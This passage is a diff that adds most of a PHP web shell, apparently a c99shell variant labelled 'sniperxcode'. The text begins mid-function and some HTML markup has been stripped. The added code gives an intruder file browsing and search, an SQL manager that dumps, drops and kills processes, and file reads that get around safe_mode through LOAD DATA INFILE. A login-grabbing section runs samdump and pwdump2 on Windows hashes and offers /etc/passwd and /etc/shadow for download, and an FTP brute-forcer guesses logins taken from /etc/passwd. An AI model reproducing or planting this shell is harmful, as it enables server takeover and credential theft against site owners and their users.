if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "ON (secure)"; +} +else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +// took the disabled functions from r57shell +?><?php echo getenv("HTTP_HOST"); ?> - sniperxcode

    + + + + +'; +?> +
    Kernel: ',1); if($win) echo ' ('.exec('ver').')'; ?>Safe-Mode:
    ',1);} else {echo 'Running As: '.get_current_user();} ?>Disabled PHP Functions: NONE';}else{echo '$df';} ?>
    Free '.view_size($free).' of '.view_size($total).' ('.$free_percent.'%)'; +} +echo 'Server IP: '.gethostbyname($_SERVER["HTTP_HOST"]).' - Your IP: '.$_SERVER["REMOTE_ADDR"].'
    +
    +

    '.htmlspecialchars($b).DIRECTORY_SEPARATOR.''; + $i++; +} +echo '   '; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo ''.view_perms_color($d).''; +} + +echo '
    '; +$letters = ''; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range('a','z') as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "["; + if ($letter.":" != $v) {$letters .= strtoupper($letter);} + else {$letters .= ''.strtoupper($letter).'';} + $letters .= ":] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +if (count($quicklaunch2) > 0) +{ +echo '
    '; + foreach($quicklaunch2 as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} + +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
  • If login is null, login is owner of process.
  • If host is null, host is localhost (default).
  • If port is null, port is 3306 (default).
  •  Please, fill the form:
    UsernamePasswordDatabase
    HostPort
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    +
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == 'grablogins') { + if ($win) { + echo 'Grab Windows Logins:

    '; + if (file_exists($_SERVER['WINDIR'])) { + echo 'Download backup SAM file: '.$_SERVER['WINDIR'].'\repair\SAM

    '; + } else { + echo 'There\'s no backup SAM file!'; + } + echo 'Execute SAMDUMP

    '; + if ($_GET['dumphashes'] == 'samdump') { + if (is_writable('.')) { + cf('samdump.exe', $samdump); + exec('samdump.exe '.$_SERVER['WINDIR'].'\repair\sam', $blah); + echo '

    '; + if (file_exists('samdump.exe')) + unlink('samdump.exe'); + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if samdump was called + echo 'Execute PWDUMP2

    '; + if ($_GET['dumphashes'] == 'pwdump2') { + if (is_writable('.')) { + cf('pwdump2.exe', $pwdump2); + cf('samdump.dll', $samdumpdll); + exec('pwdump2.exe', $blah); + echo '

    '; + if (file_exists('pwdump2.exe')) + unlink('pwdump2.exe'); + if (file_exists('samdump.dll')) + unlink('samdump.dll'); + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if pwdump2 was called + + } else { // if not windows + echo 'Grab *nix Logins:

    '; + if (file_exists('/etc/passwd')) + echo 'Download passwd: /etc/passwd'; + if (file_exists('/etc/master.passwd')) + echo 'Download master.passwd: /etc/master.passwd <- 1% chance you can view this'; + if (file_exists('/etc/shadow')) + echo 'Download shadow: /etc/shadow <- 1% chance you can view this'; + } +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This function does not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "
    Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
